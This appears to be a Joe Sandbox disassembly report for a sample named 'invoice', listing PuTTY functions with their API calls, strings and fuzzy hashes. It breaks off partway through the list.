Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID:
String ID: Break$More signals$SIGABRT$SIGALRM$SIGFPE$SIGHUP (Hangup)$SIGILL$SIGINT (Interrupt)$SIGKILL (Kill)$SIGPIPE$SIGQUIT (Quit)$SIGSEGV$SIGTERM (Terminate)$SIGUSR1$SIGUSR2
API String ID: 0-4049137225
Opcode ID: 24d9a2849d9ecc7bc9453ec0dc86c27db50e815cb56ba10adca48ea8785dd7fc
Instruction ID: 617ae3940977c2c20388733c91aa0a04b8d33759e15d306e23b8765ed75f95b3
Opcode Fuzzy Hash: 24d9a2849d9ecc7bc9453ec0dc86c27db50e815cb56ba10adca48ea8785dd7fc
Instruction Fuzzy Hash: B9318070B2022840FF74A32BFA24FCA1A428B96FE5F47A02A8C1607FA45E5DC303D700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDD0916 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 197registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32 ref: 000000013FDD0978
RegQueryValueExA.ADVAPI32 ref: 000000013FDD09C9
RegQueryValueExA.ADVAPI32 ref: 000000013FDD0A10
RegDeleteValueA.ADVAPI32 ref: 000000013FDD0ABE
RegCloseKey.ADVAPI32 ref: 000000013FDD0AD9
RegCloseKey.ADVAPI32 ref: 000000013FDD0B37
RegSetValueExA.ADVAPI32 ref: 000000013FDD0B93
RegCloseKey.ADVAPI32 ref: 000000013FDD0BC3

Strings

Recent sessions, xrefs: 000000013FDD09BA, 000000013FDD0A01, 000000013FDD0AB7, 000000013FDD0B83
Software\SimonTatham\PuTTY\Jumplist, xrefs: 000000013FDD0964

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Value$Close$Query$CreateDelete
String ID: Recent sessions$Software\SimonTatham\PuTTY\Jumplist
API String ID: 1581697145-3076341284
Opcode ID: 96f80a4e6006dd1dd6fd438eae1123a4a6906ba4375b41369ef37eedfd243cfa
Instruction ID: 44c0800b884e0ee604252549c71ec042b629c07b8a71d970c316663d6f70a303
Opcode Fuzzy Hash: 96f80a4e6006dd1dd6fd438eae1123a4a6906ba4375b41369ef37eedfd243cfa
Instruction Fuzzy Hash: 8671DF32A1965046FB20AB91B81C7EAA790EBC5B94F455038AD4E4BBE9DF7CC6478700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDC99B2 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 180stringcomCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,00000000,Pageant.exe,00000000,000000013FDC9789,?,?,00000000,?,?,00000000,00000000,00000000), ref: 000000013FDC99E8
strrchr.LIBVCRUNTIME ref: 000000013FDC9A02
strrchr.LIBVCRUNTIME ref: 000000013FDC9A1A
CoCreateInstance.OLE32 ref: 000000013FDC9AAC

Strings

../windows/winjump.c, xrefs: 000000013FDC9B40, 000000013FDC9BF0
Pageant.exe, xrefs: 000000013FDC99B4
Run %.*s, xrefs: 000000013FDC9B61, 000000013FDC9C11
appname, xrefs: 000000013FDC9B39, 000000013FDC9BE9
%.*s%s, xrefs: 000000013FDC9A2A
Connect to PuTTY session ', xrefs: 000000013FDC9B19

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: strrchr$CreateFileInstanceModuleName
String ID: %.*s%s$../windows/winjump.c$Connect to PuTTY session '$Pageant.exe$Run %.*s$appname
API String ID: 1847868590-2137604665
Opcode ID: bc647c652ea7eed317af23ef5786cb893e4434155d38b8137a3763667c9c494c
Instruction ID: 0ef986811d5462b17f9f74efd3b30cc8828f3d180951bca802bdbb0c212a3f8b
Opcode Fuzzy Hash: bc647c652ea7eed317af23ef5786cb893e4434155d38b8137a3763667c9c494c
Instruction Fuzzy Hash: 55714A35B04A4591FE04EBA6E4593E9A7A1AB85BD0F85403ADD0E47BA5EF78C747C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD79647 Relevance: 15.6, Strings: 12, Instructions: 639COMMON

Download Yara Rule

Strings

Remote side unexpectedly closed network connection, xrefs: 000000013FD7974A
Incoming packet was garbled on decryption, xrefs: 000000013FD798A8
Remote side sent SSH2_MSG_EXT_INFO that was not immediately after the initial NEWKEYS, xrefs: 000000013FD7A0AB
Invalid padding length on received packet, xrefs: 000000013FD7A01D
No valid incoming packet found, xrefs: 000000013FD79FB1
Incoming packet length field was garbled, xrefs: 000000013FD79BA1
Remote side sent SSH2_MSG_EXT_INFO after USERAUTH_SUCCESS, xrefs: 000000013FD7A0BB
Remote side closed network connection, xrefs: 000000013FD79739
Remote side sent SSH2_MSG_EXT_INFO not either preceded by NEWKEYS or followed by USERAUTH_SUCCESS, xrefs: 000000013FD7A06E
../ssh2bpp.c, xrefs: 000000013FD79D10
s->length >= 0, xrefs: 000000013FD79D09
Incorrect MAC received on packet, xrefs: 000000013FD798BB

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID:
String ID: ../ssh2bpp.c$Incoming packet length field was garbled$Incoming packet was garbled on decryption$Incorrect MAC received on packet$Invalid padding length on received packet$No valid incoming packet found$Remote side closed network connection$Remote side sent SSH2_MSG_EXT_INFO after USERAUTH_SUCCESS$Remote side sent SSH2_MSG_EXT_INFO not either preceded by NEWKEYS or followed by USERAUTH_SUCCESS$Remote side sent SSH2_MSG_EXT_INFO that was not immediately after the initial NEWKEYS$Remote side unexpectedly closed network connection$s->length >= 0
API String ID: 0-456542668
Opcode ID: 02d9eeddad56812234e516613e1f9eb888cdeeed05b5b342c926ae12f57bab0b
Instruction ID: 96eea2af0f15f03473b9d743dd53363503e621170ac1cca752f86847d1fbe251
Opcode Fuzzy Hash: 02d9eeddad56812234e516613e1f9eb888cdeeed05b5b342c926ae12f57bab0b
Instruction Fuzzy Hash: 9C624A73A05A80CAEB64CF69C48839D37A1F785F88F14913ADE4E4B799CB35C94AC741

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDD0124 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 210registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32 ref: 000000013FDD0194
RegQueryValueExA.ADVAPI32 ref: 000000013FDD01EB
RegQueryValueExA.ADVAPI32 ref: 000000013FDD026D

Strings

Software\SimonTatham\PuTTY\SshHostKeys, xrefs: 000000013FDD0181
rsa, xrefs: 000000013FDD0207
%s@%d:, xrefs: 000000013FDD0161

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: QueryValue$Open
String ID: %s@%d:$Software\SimonTatham\PuTTY\SshHostKeys$rsa
API String ID: 1606891134-1153710622
Opcode ID: eda4cbe162bbc9ab0fd4d9a44f6e4a73a1df7b775a7e3ee263c517afdea3fdfd
Instruction ID: d799828d5dae274876521373f6e53dd34a4d7e722bbf7753aa141631e17c97dd
Opcode Fuzzy Hash: eda4cbe162bbc9ab0fd4d9a44f6e4a73a1df7b775a7e3ee263c517afdea3fdfd
Instruction Fuzzy Hash: 5181D232B0464086EB10DFA6E8587EAA790FB89B94F455139EE4947BE5DF38C647C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCB588 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 136networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 000000013FDCB641
htonl.WS2_32 ref: 000000013FDCB697
socket.WS2_32 ref: 000000013FDCB6CB
SetHandleInformation.KERNEL32 ref: 000000013FDCB6DF
WSAIoctl.WS2_32 ref: 000000013FDCB72A

Strings

addr->addresses && step.curraddr < addr->naddresses, xrefs: 000000013FDCB622
family == AF_UNSPEC, xrefs: 000000013FDCB65C
../windows/winnet.c, xrefs: 000000013FDCB629, 000000013FDCB663

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: htonl$HandleInformationIoctlsocket
String ID: ../windows/winnet.c$addr->addresses && step.curraddr < addr->naddresses$family == AF_UNSPEC
API String ID: 156137457-3442744387
Opcode ID: 246774291210abbddb47019e494e3ddc81ff1bcb1ddc107094493d60f6f38f6a
Instruction ID: 18fba804f532d3d143cc8dd069bcd0efe19560140a5f0978ab5f96f8ad308736
Opcode Fuzzy Hash: 246774291210abbddb47019e494e3ddc81ff1bcb1ddc107094493d60f6f38f6a
Instruction Fuzzy Hash: DC51D132F4060496FF649B55E4987E973A0E784754F55823EDA9E0B7E0EB78CA87CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCEB82 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 000000013FDCEC29
AllocateAndInitializeSid.ADVAPI32 ref: 000000013FDCEC81
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,000000013FDCED25), ref: 000000013FDCEC8B

Part of subcall function 000000013FDCE818: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE858
Part of subcall function 000000013FDCE818: OpenProcess.KERNEL32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE86A
Part of subcall function 000000013FDCE818: GetLastError.KERNEL32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE8BB
Part of subcall function 000000013FDCE818: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE8E0
Part of subcall function 000000013FDCE818: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE912
Part of subcall function 000000013FDCE818: CopySid.ADVAPI32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE936
Part of subcall function 000000013FDCE818: CloseHandle.KERNEL32 ref: 000000013FDCE95C
Part of subcall function 000000013FDCE818: CloseHandle.KERNEL32 ref: 000000013FDCE96C
Part of subcall function 000000013FDCE818: LocalFree.KERNEL32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE97A

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,000000013FDCED25), ref: 000000013FDCECA1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,000000013FDCED25), ref: 000000013FDCECB7

Part of subcall function 000000013FDCA0FC: FormatMessageA.KERNEL32 ref: 000000013FDCA1A7

Strings

unable to construct SID for current user: %s, xrefs: 000000013FDCECAE
unable to construct SID for local same-user access only: %s, xrefs: 000000013FDCEC98
unable to construct SID for world: %s, xrefs: 000000013FDCECC4

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ErrorLast$AllocateCloseHandleInitializeLocalProcess$AllocCopyCurrentFormatFreeLengthMessageOpen
String ID: unable to construct SID for current user: %s$unable to construct SID for local same-user access only: %s$unable to construct SID for world: %s
API String ID: 742050092-2222155745
Opcode ID: 604e97e8ca4cfd740399b9676368c66060d478b3ce7e3dcb519d03750ea0e1b9
Instruction ID: 210800d265e8f7aa467e925aeccf07dbb3af240f6288eda6e64b9d1acf194dbf
Opcode Fuzzy Hash: 604e97e8ca4cfd740399b9676368c66060d478b3ce7e3dcb519d03750ea0e1b9
Instruction Fuzzy Hash: AC413776E047409AEB60DF69F84479A77E1F798350F11013EEA89837A4EB3DC6468B00

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCE818 Relevance: 13.6, APIs: 9, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE858
OpenProcess.KERNEL32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE86A
GetLastError.KERNEL32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE8BB
LocalAlloc.KERNEL32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE8E0
GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE912
CopySid.ADVAPI32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE936
CloseHandle.KERNEL32 ref: 000000013FDCE95C
CloseHandle.KERNEL32 ref: 000000013FDCE96C
LocalFree.KERNEL32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE97A

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: CloseHandleLocalProcess$AllocCopyCurrentErrorFreeLastLengthOpen
String ID:
API String ID: 621491157-0
Opcode ID: 11fb237bc5a4c511fafb9e8a3355094b403c87bfde4b3c8ca2de6d311f1cd979
Instruction ID: 776356380f01fe377904e38e1c6ed116b4ba252f5553d273b17fd79cb0d5c46d
Opcode Fuzzy Hash: 11fb237bc5a4c511fafb9e8a3355094b403c87bfde4b3c8ca2de6d311f1cd979
Instruction Fuzzy Hash: 8F41A575B116405AFFA09FA2A458BAAA392BB88B90F05413DDD5E477A4EF3CC6078740

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDC94BC Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 319comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32 ref: 000000013FDC9487
CoCreateInstance.OLE32 ref: 000000013FDC9554
CoCreateInstance.OLE32 ref: 000000013FDC95C5
CoCreateInstance.OLE32 ref: 000000013FDC976A
CoCreateInstance.OLE32 ref: 000000013FDC9826

Strings

Recent Sessions, xrefs: 000000013FDC9740
Pageant.exe, xrefs: 000000013FDC9778

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: CreateInstance
String ID: Pageant.exe$Recent Sessions
API String ID: 542301482-148644000
Opcode ID: 5ea8562522d95c4a9caeb986dd57274ea3554b11bf4a15517d62136322ba7397
Instruction ID: 7649f7a5021dcb091c5296ebf0de4a0d728dfa4665dca4bd36fda9c534a857cd
Opcode Fuzzy Hash: 5ea8562522d95c4a9caeb986dd57274ea3554b11bf4a15517d62136322ba7397
Instruction Fuzzy Hash: 26D10B36A04A4586EF10DF66E45839ABBA0FB88F94F51413ADE4E43BA4DF79C246C701

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD5BC20 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 298stringCOMMON

Download Yara Rule

APIs

strchr.LIBVCRUNTIME ref: 000000013FD5BE45

Strings

LRD, xrefs: 000000013FD5BD61
You need to specify a source port number, xrefs: 000000013FD5BF36
You need to specify a destination addressin the form "host.name:port", xrefs: 000000013FD5BFCF
A46, xrefs: 000000013FD5BCE7
%s%s, xrefs: 000000013FD5BE07
%s, xrefs: 000000013FD5BDFB
Specified forwarding already exists, xrefs: 000000013FD5BFB4

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: strchr
String ID: %s$%s%s$A46$LRD$Specified forwarding already exists$You need to specify a destination addressin the form "host.name:port"$You need to specify a source port number
API String ID: 2830005266-44983218
Opcode ID: c8596600918694915094c6da39ffc45f7d94e690825b884217a10e143c39242a
Instruction ID: a28dfc63b75ad27dc735b9827f262a18615bc25633cd2bd2246a94a42caf4015
Opcode Fuzzy Hash: c8596600918694915094c6da39ffc45f7d94e690825b884217a10e143c39242a
Instruction Fuzzy Hash: 3CB1D472B0165485FE11EFA2A81D7E95791AB86BD4F844439AE0E4BBDADF3DC7438300

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDD2A0E Relevance: 12.3, APIs: 2, Strings: 6, Instructions: 257stringCOMMON

Download Yara Rule

APIs

strchr.LIBVCRUNTIME ref: 000000013FDD2ACA
strchr.LIBVCRUNTIME ref: 000000013FDD2B32

Strings

local, xrefs: 000000013FDD2B6E
unix, xrefs: 000000013FDD2B81, 000000013FDD2B9C
display name '%s' has no ':number' suffix, xrefs: 000000013FDD2AE2
localhost, xrefs: 000000013FDD2BCE
unable to resolve host name '%s' in display name, xrefs: 000000013FDD2C90
unix:%d, xrefs: 000000013FDD2C1C

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: strchr
String ID: display name '%s' has no ':number' suffix$local$localhost$unable to resolve host name '%s' in display name$unix$unix:%d
API String ID: 2830005266-1763953115
Opcode ID: b452977721ddaae722b89483c33707699670dcc8d0479311c7fff6d0be6b8d31
Instruction ID: 44e7f0803c26c9ead9c886cbdb7ae4022e11330ec41a39b2d453b866fefcac39
Opcode Fuzzy Hash: b452977721ddaae722b89483c33707699670dcc8d0479311c7fff6d0be6b8d31
Instruction Fuzzy Hash: 11A1D531A0568045FA75DFA2E8593EE6390AF55B85F484038EE8A47BD6EF7CD643C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCCFC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64fileCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32 ref: 000000013FDCCFEE
FindFirstFileA.KERNEL32 ref: 000000013FDCD013
FindNextFileA.KERNEL32 ref: 000000013FDCD042
FindClose.KERNEL32 ref: 000000013FDCD04B
GetCurrentProcessId.KERNEL32 ref: 000000013FDCD051

Strings

\*, xrefs: 000000013FDCCFFC

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Find$File$CloseCurrentDirectoryFirstNextProcessWindows
String ID: \*
API String ID: 1945953020-2355939697
Opcode ID: 1fd13defdeb6d51771908eb0c5f5cbb0ef1da521e98a76a8c84eb6fca0b30885
Instruction ID: 764d978c42b5f053bc4f6f0b7a33ec4bf95de737c9c8be2e6215c1ecbf878e2b
Opcode Fuzzy Hash: 1fd13defdeb6d51771908eb0c5f5cbb0ef1da521e98a76a8c84eb6fca0b30885
Instruction Fuzzy Hash: 0121D235B0468096EA11AB61E9187EFA312ABD9BD0F414236DD5907BE9DE3CC6078B01

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD6B38C Relevance: 10.3, Strings: 8, Instructions: 252COMMON

Download Yara Rule

Strings

Proxy error: Unknown proxy method, xrefs: 000000013FD6B689
Proxy error: Unable to resolve proxy host name, xrefs: 000000013FD6B639
Connecting to %s proxy at %s port %d, xrefs: 000000013FD6B6F6
(IPv6), xrefs: 000000013FD6B59A
proxy, xrefs: 000000013FD6B5C1
Looking up host "%s"%s for %s, xrefs: 000000013FD6B5BA
Will use %s proxy at %s:%d to connect to %s:%d, xrefs: 000000013FD6B535
(IPv4), xrefs: 000000013FD6B5AF

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: CreateHandleInformationPipe$htonlinet_addr
String ID: (IPv4)$ (IPv6)$Connecting to %s proxy at %s port %d$Looking up host "%s"%s for %s$Proxy error: Unable to resolve proxy host name$Proxy error: Unknown proxy method$Will use %s proxy at %s:%d to connect to %s:%d$proxy
API String ID: 1756674106-2457385729
Opcode ID: 9967066c06594357208ec33bb5e3585f094d0978003cc657e2854d046b0efaab
Instruction ID: bc2e482d45cc7da163f8d21a6452562981a629505dc457b0cfffdaef128d24b0
Opcode Fuzzy Hash: 9967066c06594357208ec33bb5e3585f094d0978003cc657e2854d046b0efaab
Instruction Fuzzy Hash: EEA1AF3270478086EA24EBA6E8557DE7750F799BD0F84413AEE8D47B96DF38C2578700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDE7814 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 000000013FDE788D
RtlLookupFunctionEntry.KERNEL32 ref: 000000013FDE78A5
RtlVirtualUnwind.KERNEL32 ref: 000000013FDE78E0
IsDebuggerPresent.KERNEL32 ref: 000000013FDE7919
SetUnhandledExceptionFilter.KERNEL32 ref: 000000013FDE7923
UnhandledExceptionFilter.KERNEL32 ref: 000000013FDE792E

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
